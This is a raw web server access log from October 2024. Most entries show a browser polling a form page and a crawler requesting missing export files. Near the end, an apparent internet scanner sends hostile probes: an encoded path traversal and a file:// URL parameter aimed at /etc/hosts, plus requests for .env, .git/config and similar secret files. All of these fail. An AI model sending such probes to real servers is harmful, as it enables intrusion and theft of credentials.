178.165.176.165 - - [18/Oct/2024:14:12:04 +0200] "GET /gui/javascript/form_form.js?1729253524 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253464" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:12:10 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011111403_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:12:31 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004101103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:12:53 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10973078.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:13:05 +0200] "GET /entry.php?id=10271&&ser=253524 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=253464" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:13:05 +0200] "GET /gui/javascript/form_form.js?1729253585 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253524" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:13:14 +0200] "GET /renault.2web.at/htdocs/binaries/10656106.doc HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:13:35 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007171703_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:13:57 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116473.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:14:05 +0200] "GET /entry.php?id=10271&&ser=253585 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253524" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:14:05 +0200] "GET /gui/javascript/form_form.js?1729253645 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253585" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:14:18 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116363.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:14:39 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108031603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:15:00 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11851371.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:15:05 +0200] "GET /entry.php?id=10271&&ser=253645 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253585" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:15:05 +0200] "GET /gui/javascript/form_form.js?1729253705 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253645" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:15:21 +0200] "GET /renault.activities.at/htdocs/log/cron/autologout_3115079.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:15:42 +0200] "GET /renault.activities.at/htdocs/export/xml/data/articles/201911211403_RenArticle.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:16:03 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115997.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:16:06 +0200] "GET /entry.php?id=10271&&ser=253705 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253645" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:16:06 +0200] "GET /gui/javascript/form_form.js?1729253766 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253705" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:16:24 +0200] "GET /ed-test.activities.at/stats/lang/awstats-tr.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:16:45 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009281303_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:17:06 +0200] "GET /entry.php?id=10271&&ser=253766 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253705" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:17:06 +0200] "GET /gui/javascript/form_form.js?1729253826 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253766" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:17:06 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116002.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:17:27 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115127.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:17:48 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11423082.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:18:06 +0200] "GET /entry.php?id=10271&&ser=253826 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253766" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:18:06 +0200] "GET /gui/javascript/form_form.js?1729253886 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253826" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:18:10 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107081103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:18:31 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11185022.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:18:52 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11503862.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:19:06 +0200] "GET /entry.php?id=10271&&ser=253886 HTTP/1.1" 200 989 "http://hausegger.activities.at/entry.php?id=10271&&ser=253826" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:19:07 +0200] "GET /gui/javascript/form_form.js?1729253947 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253886" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:19:13 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115163.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:14:19:34 +0200] "GET /renault.activities.at/htdocs/log/cron/autologout_3116027.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
114.33.32.181 - - [18/Oct/2024:14:19:42 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
156.59.198.135 - - [18/Oct/2024:14:19:55 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12113238.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:20:12 +0200] "GET /entry.php?id=10271&&ser=253946 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253886" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:20:13 +0200] "GET /gui/javascript/form_form.js?1729254013 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=253946" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:14:20:38 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12269099.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:20:59 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202003040803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:21:17 +0200] "GET /entry.php?id=10271&&ser=254013 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=253946" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:21:17 +0200] "GET /gui/javascript/form_form.js?1729254077 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254013" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:14:21:20 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11125047.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:21:42 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11548343.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:14:22:02 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108031203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:14:22:21 +0200] "GET /entry.php?id=10271&&ser=254077 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254013" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:22:21 +0200] "GET /gui/javascript/form_form.js?1729254141 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254077" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
5.8.11.202 - - [18/Oct/2024:14:22:23 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
79.56.106.242 - - [18/Oct/2024:14:22:49 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
178.165.176.165 - - [18/Oct/2024:14:23:25 +0200] "GET /entry.php?id=10271&&ser=254141 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=254077" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:23:26 +0200] "GET /gui/javascript/form_form.js?1729254206 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:24:30 +0200] "GET /entry.php?id=10271&&ser=254206 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:24:30 +0200] "GET /gui/javascript/form_form.js?1729254270 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:25:31 +0200] "GET /entry.php?id=10271&&ser=254270 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:25:31 +0200] "GET /gui/javascript/form_form.js?1729254331 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:26:31 +0200] "GET /entry.php?id=10271&&ser=254331 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=254270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:26:32 +0200] "GET /gui/javascript/form_form.js?1729254391 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254331" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:27:32 +0200] "GET /entry.php?id=10271&&ser=254391 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254331" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:27:32 +0200] "GET /gui/javascript/form_form.js?1729254452 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254391" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:28:32 +0200] "GET /entry.php?id=10271&&ser=254452 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254391" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:28:32 +0200] "GET /gui/javascript/form_form.js?1729254512 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254452" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:29:32 +0200] "GET /entry.php?id=10271&&ser=254512 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254452" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:29:32 +0200] "GET /gui/javascript/form_form.js?1729254572 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254512" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:30:33 +0200] "GET /entry.php?id=10271&&ser=254572 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254512" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:30:33 +0200] "GET /gui/javascript/form_form.js?1729254633 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254572" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:31:33 +0200] "GET /entry.php?id=10271&&ser=254633 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254572" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:31:33 +0200] "GET /gui/javascript/form_form.js?1729254693 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254633" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:32:33 +0200] "GET /entry.php?id=10271&&ser=254693 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254633" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:32:33 +0200] "GET /gui/javascript/form_form.js?1729254753 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254693" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:33:33 +0200] "GET /entry.php?id=10271&&ser=254753 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254693" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:33:34 +0200] "GET /gui/javascript/form_form.js?1729254813 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254753" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:34:34 +0200] "GET /entry.php?id=10271&&ser=254813 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254753" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:34:34 +0200] "GET /gui/javascript/form_form.js?1729254874 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254813" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
209.38.219.217 - - [18/Oct/2024:14:35:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
209.38.219.217 - - [18/Oct/2024:14:35:24 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "http://mail.universimed.pl/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
178.165.176.165 - - [18/Oct/2024:14:35:34 +0200] "GET /entry.php?id=10271&&ser=254874 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254813" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:35:34 +0200] "GET /gui/javascript/form_form.js?1729254934 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254874" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:36:34 +0200] "GET /entry.php?id=10271&&ser=254934 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254874" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:36:34 +0200] "GET /gui/javascript/form_form.js?1729254994 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
179.43.168.146 - - [18/Oct/2024:14:37:21 +0200] "\x16\x03\x01" 400 383 "-" "-"
179.43.168.146 - - [18/Oct/2024:14:37:21 +0200] "GET / HTTP/1.1" 400 383 "-" "-"
179.43.168.146 - - [18/Oct/2024:14:37:21 +0200] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
178.165.176.165 - - [18/Oct/2024:14:37:35 +0200] "GET /entry.php?id=10271&&ser=254994 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=254934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:14:37:35 +0200] "GET /gui/javascript/form_form.js?1729255055 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=254994" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 290 "-" "Lkx-Apache2449TraversalPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /.DS_Store HTTP/1.1" 404 283 "-" "Go-http-client/1.1"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 329 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /api/geojson?url=file:///etc/hosts HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /idx_config/ HTTP/1.1" 404 286 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /telescope/requests HTTP/1.1" 404 286 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /info.php HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /.json HTTP/1.1" 404 280 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /login.action HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /server-status HTTP/1.1" 403 286 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:01 +0200] "GET /config.json HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:02 +0200] "GET /.env HTTP/1.1" 404 280 "-" "l9explore/1.2.2"
179.43.168.146 - - [18/Oct/2024:14:38:02 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
